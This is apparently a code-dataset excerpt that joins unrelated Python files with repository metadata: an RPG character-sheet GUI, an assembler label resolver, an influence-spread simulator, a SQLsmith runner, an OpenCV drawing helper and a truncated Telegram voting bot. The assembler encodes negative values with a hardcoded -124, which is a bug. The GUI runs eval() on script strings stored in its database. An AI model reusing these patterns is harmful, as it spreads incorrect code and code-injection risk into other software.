Created on Fri Mar 10 17:21:49 2017

@author: Lennart
"""
from Wolke import Wolke
import UI.CharakterAttribute
from PyQt5 import QtWidgets, QtCore, QtGui
import logging
import copy
from Hilfsmethoden import Hilfsmethoden
from EventBus import EventBus
import Definitionen

class AttrWrapper(QtCore.QObject):
    '''
    Wrapper class for the Attribute setting GUI.
    Contains methods for updating the GUI elements to the current values
    and for changing the current values to the values set by the user.
    '''
    # Emitted whenever the user changes an attribute or energy value
    modified = QtCore.pyqtSignal()

    def __init__(self):
        ''' Initialize the GUI and set signals for the spinners'''
        super().__init__()
        logging.debug("Initializing AttrWrapper...")
        self.form = QtWidgets.QWidget()
        self.ui = UI.CharakterAttribute.Ui_formAttribute()
        self.ui.setupUi(self.form)

        # pre-sort and -filter vorteile to improve performance of tooltip generation
        self.vorteile = {}
        for attribut in Definitionen.Attribute:
            self.vorteile[attribut] = []
        for vorteil in sorted(Wolke.DB.vorteile.values(), key = lambda v: v.typ):
            for attribut in Definitionen.Attribute:
                if Hilfsmethoden.isAttributVoraussetzung(attribut, vorteil.voraussetzungen):
                    self.vorteile[attribut].append(vorteil)

        # apply the configured heading font/colour to the column headers
        font = QtGui.QFont(Wolke.Settings["FontHeading"], Wolke.Settings["FontHeadingSize"])
        font.setBold(True)
        self.ui.labelWert.setFont(font)
        self.ui.labelWert.setStyleSheet("color: " + Wolke.HeadingColor + ";}")
        self.ui.labelWert2.setFont(font)
        self.ui.labelWert2.setStyleSheet("color: " + Wolke.HeadingColor + ";}")
        self.ui.labelPW.setFont(font)
        self.ui.labelPW.setStyleSheet("color: " + Wolke.HeadingColor + ";}")
        self.ui.labelKosten.setFont(font)
        self.ui.labelKosten.setStyleSheet("color: " + Wolke.HeadingColor + ";}")
        self.ui.labelFormel.setFont(font)
        self.ui.labelFormel.setStyleSheet("color: " + Wolke.HeadingColor + ";}")

        #Signals
        # look up the per-attribute spinner / cost label / PW widgets by name
        self.widgetWert = {}
        self.widgetKosten = {}
        self.widgetPW = {}
        for attribut in Definitionen.Attribute:
            self.widgetWert[attribut] = getattr(self.ui, "spin" + attribut)
            self.widgetKosten[attribut] = getattr(self.ui, "labelKosten" + attribut)
            self.widgetPW[attribut] = getattr(self.ui, "pw" + attribut)
            self.widgetWert[attribut].setKeyboardTracking(False)
            self.widgetWert[attribut].valueChanged.connect(self.update)

        self.ui.spinAsP.valueChanged.connect(self.update)
        self.ui.spinKaP.valueChanged.connect(self.update)
        # guard flag: suppress update() while load() programmatically sets values
        self.currentlyLoading = False

    def updateTooltip(self, attribut):
        # Build a tooltip previewing what raising `attribut` by one point
        # would change: derived values, newly affordable advantages, and
        # skill base value increases.
        attribute = copy.deepcopy(Wolke.Char.attribute)
        attribute[attribut].wert += 1
        attribute[attribut].aktualisieren()
        tooltip = "Eine Steigerung von " + attribut + " auf " + str(attribute[attribut].wert) + " bewirkt:\n"

        # derived values with the hypothetical (raised) attribute set
        abgeleitetNew = []
        scriptAPI = { 'getAttribut' : lambda attribut: attribute[attribut].wert }
        wsBasis = eval(Wolke.DB.einstellungen["Basis WS Script"].toText(), scriptAPI)
        mrBasis = eval(Wolke.DB.einstellungen["Basis MR Script"].toText(), scriptAPI)
        gsBasis = eval(Wolke.DB.einstellungen["Basis GS Script"].toText(), scriptAPI)
        iniBasis = eval(Wolke.DB.einstellungen["Basis INI Script"].toText(), scriptAPI)
        dhBasis = eval(Wolke.DB.einstellungen["Basis DH Script"].toText(), scriptAPI)
        schadensbonusBasis = eval(Wolke.DB.einstellungen["Basis Schadensbonus Script"].toText(), scriptAPI)

        # subtract the current values to get the deltas
        scriptAPI = { 'getAttribut' : lambda attribut: Wolke.Char.attribute[attribut].wert }
        wsBasis -= eval(Wolke.DB.einstellungen["Basis WS Script"].toText(), scriptAPI)
        mrBasis -= eval(Wolke.DB.einstellungen["Basis MR Script"].toText(), scriptAPI)
        gsBasis -= eval(Wolke.DB.einstellungen["Basis GS Script"].toText(), scriptAPI)
        iniBasis -= eval(Wolke.DB.einstellungen["Basis INI Script"].toText(), scriptAPI)
        dhBasis -= eval(Wolke.DB.einstellungen["Basis DH Script"].toText(), scriptAPI)
        schadensbonusBasis -= eval(Wolke.DB.einstellungen["Basis Schadensbonus Script"].toText(), scriptAPI)

        if wsBasis != 0:
            abgeleitetNew.append("Wundschwelle " + ("+" if wsBasis > 0 else "") + str(wsBasis))
        if mrBasis != 0:
            abgeleitetNew.append("Magieresistenz " + ("+" if mrBasis > 0 else "") + str(mrBasis))
        if gsBasis != 0:
            abgeleitetNew.append("Geschwindigkeit " + ("+" if gsBasis > 0 else "") + str(gsBasis))
        if iniBasis != 0:
            abgeleitetNew.append("Initiative " + ("+" if iniBasis > 0 else "") + str(iniBasis))
        if schadensbonusBasis != 0:
            abgeleitetNew.append("Schadensbonus " + ("+" if schadensbonusBasis > 0 else "") + str(schadensbonusBasis))
        if dhBasis != 0:
            abgeleitetNew.append("Durchhaltevermögen " + ("+" if dhBasis > 0 else "") + str(dhBasis))

        # advantages that would become purchasable with the raised attribute
        vortNew = []
        if Wolke.Char.voraussetzungenPruefen:
            for vort in self.vorteile[attribut]:
                if vort.name in Wolke.Char.vorteile:
                    continue
                elif Hilfsmethoden.voraussetzungenPrüfen(Wolke.Char.vorteile, Wolke.Char.waffen, Wolke.Char.attribute, Wolke.Char.übernatürlicheFertigkeiten, Wolke.Char.fertigkeiten, vort.voraussetzungen):
                    # already affordable today; not newly unlocked
                    continue
                elif Hilfsmethoden.voraussetzungenPrüfen(Wolke.Char.vorteile, Wolke.Char.waffen, attribute, Wolke.Char.übernatürlicheFertigkeiten, Wolke.Char.fertigkeiten, vort.voraussetzungen):
                    vortNew.append(vort.name + " erwerbbar")

        # mundane skills whose base value would rise
        fertNew = []
        ferts = copy.deepcopy(Wolke.Char.fertigkeiten)
        for fert in sorted(ferts.values(), key = lambda f: f.printclass):
            fert.aktualisieren(Wolke.Char.attribute)
            basisAlt = fert.basiswert
            fert.aktualisieren(attribute)
            if basisAlt != fert.basiswert:
                fertNew.append(fert.name + " +" + str(fert.basiswert - basisAlt))

        # supernatural skills whose base value would rise; skills without
        # bought talents are only counted, not listed individually
        fertsÜberNew = []
        ferts = copy.deepcopy(Wolke.Char.übernatürlicheFertigkeiten)
        more = 0
        for fert in sorted(ferts.values(), key = lambda f: f.printclass):
            if len(fert.gekaufteTalente) == 0:
                more += 1
                continue
            fert.aktualisieren(Wolke.Char.attribute)
            basisAlt = fert.basiswert
            fert.aktualisieren(attribute)
            if basisAlt != fert.basiswert:
                fertsÜberNew.append(fert.name + " +" + str(fert.basiswert - basisAlt))
        if more > 0:
            fertsÜberNew.append(str(more) + " ungenutzte übernat. Fertigkeiten +1")

        # join the sections with blank lines between non-empty groups
        tooltipAdd = []
        for infos in [abgeleitetNew, fertNew, fertsÜberNew, vortNew]:
            tooltipAdd += infos
            if len(infos) > 0:
                tooltipAdd.append("")
        if len(tooltipAdd) > 0:
            tooltipAdd.pop()
            tooltip += "\n".join(tooltipAdd)
        else:
            tooltip = tooltip[:-2] + " keine weiteren Verbesserungen."
        self.widgetWert[attribut].setToolTip(tooltip)

    def checkConsequences(self, attribut, wert):
        # Ask the user to confirm lowering `attribut` to `wert` when that
        # would invalidate purchased advantages. Returns True to proceed.
        attribute = copy.deepcopy(Wolke.Char.attribute)
        attribute[attribut].wert = wert
        attribute[attribut].aktualisieren()
        remove = Wolke.Char.findUnerfüllteVorteilVoraussetzungen(attribute=attribute)
        if remove:
            messageBox = QtWidgets.QMessageBox()
            messageBox.setIcon(QtWidgets.QMessageBox.Question)
            messageBox.setWindowTitle(attribut + " senken")
            messageBox.setText("Wenn du " + attribut + " auf " + str(wert) + " senkst, verlierst du die folgenden Vorteile:")
            remove.append("\nBist du sicher?")
            messageBox.setInformativeText("\n".join(remove))
            messageBox.addButton(QtWidgets.QPushButton("Ja"), QtWidgets.QMessageBox.YesRole)
            messageBox.addButton(QtWidgets.QPushButton("Abbrechen"), QtWidgets.QMessageBox.RejectRole)
            result = messageBox.exec_()
            # 0 is the index of the "Ja" button
            return result == 0
        return True

    def updateAttribut(self, attribut):
        # Push a single spinner value into the character model (with a
        # confirmation prompt when the change would drop advantages).
        # Returns True if the model changed.
        changed = False
        uiElement = self.widgetWert[attribut]
        if Wolke.Char.attribute[attribut].wert != uiElement.value():
            if self.checkConsequences(attribut, uiElement.value()):
                Wolke.Char.attribute[attribut].wert = uiElement.value()
                Wolke.Char.attribute[attribut].aktualisieren()
                changed = True
            else:
                # user cancelled: restore the spinner to the model value
                uiElement.setValue(Wolke.Char.attribute[attribut].wert)
            # attribute changes can shift every tooltip preview
            for attribut in Definitionen.Attribute:
                self.updateTooltip(attribut)
        return changed

    def update(self):
        if self.currentlyLoading:
            return
        ''' Set and refresh all Attributes '''
        changed = False
        for attribut in Definitionen.Attribute:
            if self.updateAttribut(attribut):
                changed = True
        if Wolke.Char.asp.wert != self.ui.spinAsP.value():
            Wolke.Char.asp.wert = self.ui.spinAsP.value()
            changed = True
        if Wolke.Char.kap.wert != self.ui.spinKaP.value():
            Wolke.Char.kap.wert = self.ui.spinKaP.value()
            changed = True
        if changed:
            self.modified.emit()
        self.updateDerivedValues()

    def getSteigerungskostenAsP(self):
        # EP cost label (HTML) for buying the next astral point
        val = (Wolke.Char.asp.wert + 1) * Wolke.Char.asp.steigerungsfaktor
        return "(<span style='font-size: 9pt; font-weight: " + Hilfsmethoden.qtWeightToCSS(QtGui.QFont.Black) + "; font-family: \"Font Awesome 6 Free Solid\";'>\uf176</span>&nbsp;&nbsp;" + str(EventBus.applyFilter("asp_kosten", val, { "charakter" : Wolke.Char, "wert" : Wolke.Char.asp.wert })) + " EP)"

    def getSteigerungskostenKaP(self):
        # EP cost label (HTML) for buying the next karma point
        # NOTE(review): this applies the "asp_kosten" filter even though it
        # computes KaP costs — looks like a copy-paste of the AsP variant;
        # confirm whether a "kap_kosten" filter was intended.
        val = (Wolke.Char.kap.wert + 1) * Wolke.Char.kap.steigerungsfaktor
        return "(<span style='font-size: 9pt; font-weight: " + Hilfsmethoden.qtWeightToCSS(QtGui.QFont.Black) + "; font-family: \"Font Awesome 6 Free Solid\";'>\uf176</span>&nbsp;&nbsp;" + str(EventBus.applyFilter("asp_kosten", val, { "charakter" : Wolke.Char, "wert" : Wolke.Char.kap.wert })) + " EP)"

    def getAttributSteigerungskosten(self, attr):
        # EP cost label (HTML) for raising attribute `attr` by one
        attribut = Wolke.Char.attribute[attr]
        val = (attribut.wert + 1) * attribut.steigerungsfaktor
        return "<span style='font-size: 9pt; font-weight: " + Hilfsmethoden.qtWeightToCSS(QtGui.QFont.Black) + "; font-family: \"Font Awesome 6 Free Solid\";'>\uf176</span>&nbsp;&nbsp;" + str(EventBus.applyFilter("attribut_kosten", val, { "charakter" : Wolke.Char, "attribut" : attr, "wert" : attribut.wert + 1 })) + " EP"

    def updateDerivedValues(self):
        # Refresh probe values (wert * 2), cost labels and the derived
        # stats shown in the form from the character model.
        for attribut in Definitionen.Attribute:
            self.widgetPW[attribut].setValue(Wolke.Char.attribute[attribut].wert*2)
            self.widgetKosten[attribut].setText(self.getAttributSteigerungskosten(attribut))
        self.ui.abWS.setValue(Wolke.Char.ws)
        self.ui.abGS.setValue(Wolke.Char.gs)
        self.ui.abIN.setValue(Wolke.Char.ini)
        self.ui.abMR.setValue(Wolke.Char.mr)
        self.ui.abSB.setValue(Wolke.Char.schadensbonus)
        self.ui.abDH.setValue(Wolke.Char.dh)
        self.ui.labelKostenAsP.setText(self.getSteigerungskostenAsP())
        self.ui.labelKostenKaP.setText(self.getSteigerungskostenKaP())

    def load(self):
        self.currentlyLoading = True
        ''' Load all values and derived values '''
        for attribut in Definitionen.Attribute:
            self.widgetWert[attribut].setValue(Wolke.Char.attribute[attribut].wert)
            self.updateTooltip(attribut)

        self.ui.abAsP.setValue(Wolke.Char.aspBasis + Wolke.Char.aspMod)
        self.ui.abKaP.setValue(Wolke.Char.kapBasis + Wolke.Char.kapMod)

        # AsP purchase is only available to spellcasters
        if "Zauberer I" in Wolke.Char.vorteile:
            self.ui.spinAsP.setEnabled(True)
            self.ui.spinAsP.setValue(Wolke.Char.asp.wert)
        else:
            self.ui.spinAsP.setValue(0)
            self.ui.spinAsP.setEnabled(False)

        # KaP spinner doubles as GuP for pact characters; relabel accordingly
        self.ui.lblKap.setText("KaP")
        self.ui.lblKapZugekauft.setText("Karmaenergie")
        self.ui.lblKapZugekauft.setToolTip("<html><head/><body><p>Als Geweihter stellt dir deine Gottheit Karmaenergie zur Verfügung: "\
            "Die Vorteile Geweiht I/II/III/IV verleihen dir 8/16/24/32 Karmapunkte (KaP), die du für Liturgien nutzen kannst. "\
            "Du kannst diesen Vorrat an maximalen KaP durch den Zukauf nach Steigerungsfaktor 1 erhöhen.</p></body></html>")
        if "Geweiht I" in Wolke.Char.vorteile:
            self.ui.spinKaP.setEnabled(True)
            self.ui.spinKaP.setValue(Wolke.Char.kap.wert)
        elif "Paktierer I" in Wolke.Char.vorteile:
            self.ui.spinKaP.setEnabled(True)
            self.ui.spinKaP.setValue(Wolke.Char.kap.wert)
            self.ui.lblKap.setText("GuP")
            self.ui.lblKapZugekauft.setText("Gunstpunkte")
            self.ui.lblKapZugekauft.setToolTip("<html><head/><body><p>Ein Paktierer selbst verfügt nicht über übernatürliche Macht, sondern "\
                "erbittet den Beistand seines Erzdämonen: Der Vorteil Paktierer I/II/III/IV verleiht ihm 8/16/24/32 Gunstpunkte (GuP), "\
                "mit denen er den Erzdämon anrufen kann. GuP werden nach Steigerungsfaktor 1 gesteigert. Meist geschieht das, wenn der Paktierer "\
                "ohnehin einen Kreis der Verdammnis aufsteigt oder dem Erzdämonen auf andere Weise nahe ist.</p></body></html>")
        else:
            self.ui.spinKaP.setValue(0)
            self.ui.spinKaP.setEnabled(False)
        self.updateDerivedValues()
        self.currentlyLoading = False
49.878136
322
0.64257
b9a758d95904be8229412da42c0516b18ac23aa9
3,957
py
Python
Assembler/labels.py
Laegluin/mikrorechner
7e5e878072c941e422889465c43dea838b83e5fd
[ "MIT" ]
1
2019-01-28T01:53:20.000Z
2019-01-28T01:53:20.000Z
Assembler/labels.py
Laegluin/mikrorechner
7e5e878072c941e422889465c43dea838b83e5fd
[ "MIT" ]
null
null
null
Assembler/labels.py
Laegluin/mikrorechner
7e5e878072c941e422889465c43dea838b83e5fd
[ "MIT" ]
null
null
null
import datastrings
import re
import exceptions as error


def process_labels(commands):
    """Resolve all label references in `commands`.

    On any label error (duplicate label, unresolvable replacement) the
    error is reported and binary_file_not_creatable_exception is raised
    so the caller aborts binary generation.
    """
    try:
        return replace_labels_with_values(commands)
    except (error.label_duplicate_error,error.label_replacement_not_successful_error) as err:
        print(err.string)
        raise error.binary_file_not_creatable_exception('Binary File will not be created. Process has stoppd')


def replace_labels_with_values(commands):
    """Rewrite absolute label jumps as relative jumps and expand
    `Rn = <label>` pseudo-instructions into real instruction sequences.

    Returns the rewritten command list.
    NOTE(review): `commands_with_reljumps = commands` aliases the input,
    so the jump rewrites mutate the caller's list in place while the
    register-assignment branch rebinds a new list — presumably intended,
    but worth confirming.
    """
    label_list = get_label_adress_dictionary(commands)
    label_values = get_label_values_dictionary(commands)
    commands_with_reljumps = commands
    labelname_options = '|'.join(label_list)
    addr = 0
    print('Input after replacing and cutting down Labels, with adresses')
    for line, command in enumerate(commands):
        if re.match('(jump)\s+(to)\s+(' + labelname_options + ')\s*(_\w+\s*)?(\s+#(.)*)?$', command):
            # Displacement from the current instruction address.
            # (The original contained an `if dest - 4 > 0:` conditional
            # whose two branches were byte-identical; collapsed to a
            # single statement — behavior unchanged.)
            dest = label_list[command.split()[2]] - addr
            commands_with_reljumps[line] = 'jump_rel to ' + str(dest)
        elif re.match('(jump_if)\s+(to)\s+(' + labelname_options + ')\s*(_\w+\s*)?$', command):
            dest = label_list[command.split()[2]] - addr
            commands_with_reljumps[line] = 'jump_rel_if to ' + str(dest)
        elif re.match('(R)\d{1,2}\s+(=)\s+(' + labelname_options + ')\s*$', command):
            words = command.split()
            replacement = replace_register_equals_label(words[0],label_values[words[2]])
            commands_with_reljumps = commands_with_reljumps[:line] + replacement + commands_with_reljumps[line+1:]
        print(str(addr) + ':\t' + str(commands_with_reljumps[line]))
        try:
            addr += datastrings.necessary_byte_storage(command)
        except error.data_string_not_convertible_error:
            raise error.label_replacement_not_successful_error('Label konnten nicht ersetzt werden')
    print('\n')
    return commands_with_reljumps

# which register may we use for temporary storage?
def replace_register_equals_label(register, value): if datastrings.is_datastring(value): val = int(value,0) if val < 0: binary_string = '{0:{fill}{width}b}'.format((-124 + 2 ** 32) % 2 ** 32, fill='0', width=32) else: binary_string = '{0:{fill}{width}b}'.format(val, fill='0', width=32) replacement = [register + " = 0b" + binary_string[0:21], "R3 = 11", register + " = " + register + " << R3 times", "R3 = 0b" + binary_string[21:], register + " = " + register + " | R3"] return replacement return [] def get_label_adress_dictionary(commands): addr = 0 label_duplicate = 0 labels = {} for line, command in enumerate(commands): if(re.match(r'(.)*\s+(_)[A-Za-z0-9_-]+\s*$',command)): label_name = command.split()[-1][1:] for labelName in labels: if labelName == label_name: label_duplicate = 1 if not label_duplicate: labels[label_name] = addr else: raise error.label_duplicate_error('Line ' + str(line+1) + ': Labelname ' + label_name + ' zweimal deklariert!') try: addr += datastrings.necessary_byte_storage(command) except error.data_string_not_convertible_error: print('Line ' + str(line+1) + ': datastring '+ command +'not convertible!') return labels def get_label_values_dictionary(commands): labels_and_values = {} for line, command in enumerate(commands): if(re.match(r'(.)*\s+(_)[A-Za-z0-9_-]+\s*$',command)): label_name = command.split()[-1][1:] labels_and_values[label_name] = re.sub(r'_[A-Za-z0-9_-]+\s*$','',command) return labels_and_values # if __name__ == '__main__': # start(sys.argv[0])
50.088608
144
0.628506
e06a857fedc36a097de58ff641e29f6ee75a71f1
3,883
py
Python
CS303/lab7-9/work/ISE/ISE.py
Wycers/Codelib
86d83787aa577b8f2d66b5410e73102411c45e46
[ "MIT" ]
22
2018-08-07T06:55:10.000Z
2021-06-12T02:12:19.000Z
CS303/lab7-9/work/ISE/ISE.py
Wycers/Codelib
86d83787aa577b8f2d66b5410e73102411c45e46
[ "MIT" ]
28
2020-03-04T23:47:22.000Z
2022-02-26T18:50:00.000Z
CS303/lab7-9/work/ISE/ISE.py
Wycers/Codelib
86d83787aa577b8f2d66b5410e73102411c45e46
[ "MIT" ]
4
2019-11-09T15:41:26.000Z
2021-10-10T08:56:57.000Z
from queue import Queue import multiprocessing as mp import time import sys import argparse import os import random import numpy as np worker_num = 8 epoch = 2000 class Node: def __init__(self, name, threshold=None): self.name = name self.next = [] self.weight = [] class Worker(mp.Process): def __init__(self): super(Worker, self).__init__(target=self.start) self.inQ = mp.Queue() self.outQ = mp.Queue() def run(self): while True: model, nodes, seeds = self.inQ.get() if model == 'IC': self.outQ.put(IC(nodes, seeds)) elif model == 'LT': self.outQ.put(LT(nodes, seeds)) def IC(nodes, seeds): random.seed(int(os.getpid() + time.time() * 1e3 + 114514)) cnt = 0 queue = [] acted = [0]* len(nodes) for i in seeds: queue.append(i) acted[i.name] = 1 cnt = cnt + 1 while(len(queue) != 0): for i in range(len(queue[0].next)) : if acted[queue[0].next[i].name] == 0 : ret = random.random() if ret <= queue[0].weight[i] : cnt = cnt + 1 acted[queue[0].next[i].name] = 1 queue.append(queue[0].next[i]) del queue[0] return sum([1 for node in nodes if acted[node.name]]) def LT(nodes, seeds): random.seed(int(os.getpid() + time.time() * 1e3 + 114514)) queue = [[], []] now = 0 acted = [False] * len(nodes) threshold = [random.random() for _ in nodes] for i in seeds: queue[now].append(i) while len(queue[now]) > 0: for u in queue[now]: acted[u.name] = True for i in range(len(u.next)): threshold[u.next[i].name] -= u.weight[i] for u in queue[now]: for i in range(len(u.next)): if acted[u.next[i].name]: continue if threshold[u.next[i].name] > 0: continue queue[now ^ 1].append(u.next[i]) acted[u.next[i].name] = True queue[now] = [] now ^= 1 return sum([1 for node in nodes if acted[node.name]]) if __name__ == '__main__': start = time.time() parser = argparse.ArgumentParser() parser.add_argument('-i', '--file_name', type=str, default='network.txt') parser.add_argument('-s', '--seed', type=str, default='seed1.txt') parser.add_argument('-m', '--model', type=str, default='IC') parser.add_argument('-t', 
'--time_limit', type=int, default=120) args = parser.parse_args() time_limit = args.time_limit nodes = [] with open(args.file_name) as f: line = f.readline() tmp = line.split(' ') N = int(tmp[0]) for i in range(N+1): nodes.append(Node(int(i))) for line in f: tmp = line.split(' ') l = int(tmp[0].strip()) r = int(tmp[1].strip()) w = float(tmp[2].strip()) nodes[l].next.append(nodes[r]) nodes[l].weight.append(w) seeds = [] with open(args.seed) as f: for line in f: tmp = int(line.strip()) seeds.append(nodes[tmp]) sys.setrecursionlimit(1000000) if worker_num == 0 or epoch == 0: exit(0) random.seed(int(os.getpid() + time.time() * 1e3 + 114514)) workers = [] for i in range(worker_num): workers.append(Worker()) workers[i].start() data = (args.model, nodes, seeds) for i in range(epoch): workers[i % worker_num].inQ.put(data) totalsum = 0 for i in range(epoch): totalsum += workers[i % worker_num].outQ.get() print(totalsum/epoch) # print(time.time() - start) for w in workers: w.terminate() sys.stdout.flush()
24.732484
77
0.523822
0ef0f3a4830852c838985588d6408ba9048c6404
176
py
Python
app/admin/__init__.py
uosorio/heroku_face
7d6465e71dba17a15d8edaef520adb2fcd09d91e
[ "Apache-2.0" ]
73
2018-12-14T18:12:33.000Z
2022-02-23T21:39:59.000Z
app/admin/__init__.py
uosorio/heroku_face
7d6465e71dba17a15d8edaef520adb2fcd09d91e
[ "Apache-2.0" ]
4
2019-11-23T18:08:18.000Z
2021-08-23T09:00:15.000Z
app/admin/__init__.py
uosorio/heroku_face
7d6465e71dba17a15d8edaef520adb2fcd09d91e
[ "Apache-2.0" ]
33
2019-06-03T00:30:57.000Z
2022-03-10T23:54:43.000Z
""" AUTOR: Juanjo FECHA DE CREACIÓN: 24/05/2019 """ from flask import Blueprint admin_bp = Blueprint('admin', __name__, template_folder='templates') from . import routes
12.571429
68
0.727273
161c7247d8f7e839d50d1d287907b990848d49ad
1,288
py
Python
scripts/runsqlsmith.py
AldoMyrtaj/duckdb
3aa4978a2ceab8df25e4b20c388bcd7629de73ed
[ "MIT" ]
2,816
2018-06-26T18:52:52.000Z
2021-04-06T10:39:15.000Z
scripts/runsqlsmith.py
AldoMyrtaj/duckdb
3aa4978a2ceab8df25e4b20c388bcd7629de73ed
[ "MIT" ]
1,310
2021-04-06T16:04:52.000Z
2022-03-31T13:52:53.000Z
scripts/runsqlsmith.py
AldoMyrtaj/duckdb
3aa4978a2ceab8df25e4b20c388bcd7629de73ed
[ "MIT" ]
270
2021-04-09T06:18:28.000Z
2022-03-31T11:55:37.000Z
# run SQL smith and collect breaking queries import os import re import subprocess import sys import sqlite3 from python_helpers import open_utf8 sqlsmith_db = 'sqlsmith.db' sqlsmith_test_dir = 'test/sqlsmith/queries' export_queries = False con = sqlite3.connect(sqlsmith_db) c = con.cursor() if len(sys.argv) == 2: if sys.argv[1] == '--export': export_queries = True elif sys.argv[1] == '--reset': c.execute('DROP TABLE IF EXISTS sqlsmith_errors') else: print('Unknown query option ' + sys.argv[1]) exit(1) if export_queries: c.execute('SELECT query FROM sqlsmith_errors') results = c.fetchall() for fname in os.listdir(sqlsmith_test_dir): os.remove(os.path.join(sqlsmith_test_dir, fname)) for i in range(len(results)): with open(os.path.join(sqlsmith_test_dir, 'sqlsmith-%d.sql' % (i + 1)), 'w+') as f: f.write(results[i][0] + "\n") exit(0) def run_sqlsmith(): subprocess.call(['build/debug/third_party/sqlsmith/sqlsmith', '--duckdb=:memory:']) c.execute('CREATE TABLE IF NOT EXISTS sqlsmith_errors(query VARCHAR)') while True: # run SQL smith run_sqlsmith() # get the breaking query with open_utf8('sqlsmith.log', 'r') as f: text = re.sub('[ \t\n]+', ' ', f.read()) c.execute('INSERT INTO sqlsmith_errors VALUES (?)', (text,)) con.commit()
23.851852
85
0.701863
164cb532a76617daac24630c5cbab3d72c4bf693
2,203
py
Python
robolib/robogui/pixel_editor.py
Obyoxar/RobolabStatistics
08343ca3ac49df7efdac33692d7cc4b783e851f5
[ "MIT" ]
2
2017-11-30T21:12:11.000Z
2017-12-01T07:52:43.000Z
robolib/robogui/pixel_editor.py
Obyoxar/RobolabStatistics
08343ca3ac49df7efdac33692d7cc4b783e851f5
[ "MIT" ]
14
2017-11-14T18:12:53.000Z
2018-06-03T16:07:57.000Z
robolib/robogui/pixel_editor.py
Obyoxar/RobolabStatistics
08343ca3ac49df7efdac33692d7cc4b783e851f5
[ "MIT" ]
3
2018-02-05T10:40:03.000Z
2018-02-09T09:29:19.000Z
import cv2 import numpy as np from robolib.images.feature_extraction import resize_image_to_info __DEFAULT_CONTINUE_KEYS = [27, 13, 32] def get_pixel_input_raw(rows, cols, name="Edit Image", dtype=np.float32, low=-1, high=1, continue_keys=None): return np.array(_get_pixel_input_raw(rows, cols, name, dtype, low, high, continue_keys)[:, :]) def _get_pixel_input_raw(rows, cols, name="Edit Image", dtype=np.float32, low=-1, high=1, continue_keys=None): """Get a small image drawn by the user.""" if continue_keys is None: continue_keys = __DEFAULT_CONTINUE_KEYS def draw_circle(event, x, y, flags, param): if 0 <= x < img.shape[1] and 0 <= y < img.shape[0]: if event in [cv2.EVENT_MOUSEMOVE, cv2.EVENT_LBUTTONDOWN] and flags & cv2.EVENT_FLAG_LBUTTON: img[y, x] = low if flags & cv2.EVENT_FLAG_SHIFTKEY else high img = np.empty((rows, cols, 1), dtype) img.fill(low) cv2.namedWindow(name, cv2.WINDOW_KEEPRATIO) cv2.setMouseCallback(name, draw_circle) while True: cv2.imshow(name, img) if wait_for_end_key(continue_keys): break cv2.destroyAllWindows() return img def get_drawing_input(dst_rows, dst_cols, inp_rows=None, inp_cols=None, name="Input Drawing", dtype=np.float32, low=-1, high=1, continue_keys=None): if inp_rows is None: inp_rows = dst_rows * 2 if inp_cols is None: inp_cols = dst_cols * 2 img = _get_pixel_input_raw(inp_rows, inp_cols, name, dtype, low, high, continue_keys) img = resize_image_to_info(img, dst_rows, dst_cols, low, high) return np.array(img[:, :]).reshape((9, 9, 1)) def show_image(mat, name="Image", end_key=27, continue_keys=None): if continue_keys is None: continue_keys = __DEFAULT_CONTINUE_KEYS cv2.namedWindow(name, cv2.WINDOW_KEEPRATIO) cv2.imshow(name, mat) ret = False while True: k = wait_for_end_key(continue_keys) if k: if k == end_key: ret = True break cv2.destroyAllWindows() return ret def wait_for_end_key(continue_keys): k = cv2.waitKey(20) & 0xFF return k if k in continue_keys else 0
30.597222
148
0.669995
d5c1194ffec6d10f95aba586977b20adfc1cbf7c
26,507
py
Python
DummerStammtischBot.py
VVEIRD/DummerStammtischBot
da0fd2dfe354a7fda5790023d199ddd9c5fbf76c
[ "MIT" ]
1
2021-08-11T18:50:04.000Z
2021-08-11T18:50:04.000Z
DummerStammtischBot.py
VVEIRD/DummerStammtischBot
da0fd2dfe354a7fda5790023d199ddd9c5fbf76c
[ "MIT" ]
1
2019-05-16T06:28:36.000Z
2019-05-16T06:28:36.000Z
DummerStammtischBot.py
VVEIRD/DummerStammtischBot
da0fd2dfe354a7fda5790023d199ddd9c5fbf76c
[ "MIT" ]
1
2019-05-14T14:02:58.000Z
2019-05-14T14:02:58.000Z
#!/usr/bin/env python # -*- coding: utf-8 -*- ## Stammtischbot # # Macht Mittwochs eine Umfrage um herauszufinden wohin es zum Stammtisch gehen soll import sys import json import sqlite3 from telegram.ext import Updater from telegram.ext import CommandHandler from telegram.ext import MessageHandler, Filters import datetime, time import os import logging from threading import Thread import sys os.environ['TZ'] = 'Europe/Berlin' TIME_ZONE_MOD=+2 TOKEN = sys.argv[1] DEFAULT_STAMMTISCHTAG = 3 MAX_LOCATIONS = 30 TAGE = {1 : "Montag", 2 : "Dienstag", 3 : "Mittwoch", 4 : "Donnerstag", 5 : "Freitag", 6 : "Samstag", 7 : "Sonntag"} logging.basicConfig(format='%(asctime)s - %(name)s - %(levelname)s - %(message)s', level=logging.INFO) conn = sqlite3.connect('DummerStammtischBot.db') c = conn.cursor() def add_column_if_not_exists(c, table_name, new_column, new_column_type): tab_exists=False for row in c.execute('SELECT name FROM sqlite_master WHERE type= ? AND name = ?', ['table', table_name]): tab_exists=True if tab_exists: columns = [i[1] for i in c.execute('PRAGMA table_info(' + str(table_name) + ')')] if new_column not in columns: c.execute('ALTER TABLE ' + str(table_name) + ' ADD COLUMN ' + str(new_column) + ' ' + str(new_column_type)) # Create table c.execute('''CREATE TABLE IF NOT EXISTS chatrooms (chat_id INTEGER, stammtischtag INTEGER, last_notified INTEGER, last_voting_notification INTEGER, last_organizer INTEGER )''') # Add last_organizer for existing databases add_column_if_not_exists(c, 'chatrooms', 'last_organizer', 'INTEGER') c.execute('''CREATE TABLE IF NOT EXISTS "locations" ( "chat_id" INTEGER, "l_id" INTEGER, "location" TEXT UNIQUE, PRIMARY KEY("chat_id","l_id") )''') c.execute('''CREATE TABLE IF NOT EXISTS "votings" ( "chat_id" INTEGER, "member_id" INTEGER, "member_name" TEXT, "location_id" INTEGER, PRIMARY KEY("chat_id","member_id") )''') c.execute('''CREATE TABLE IF NOT EXISTS "voiced" ( "chat_id" INTEGER, "member_id" INTEGER, PRIMARY 
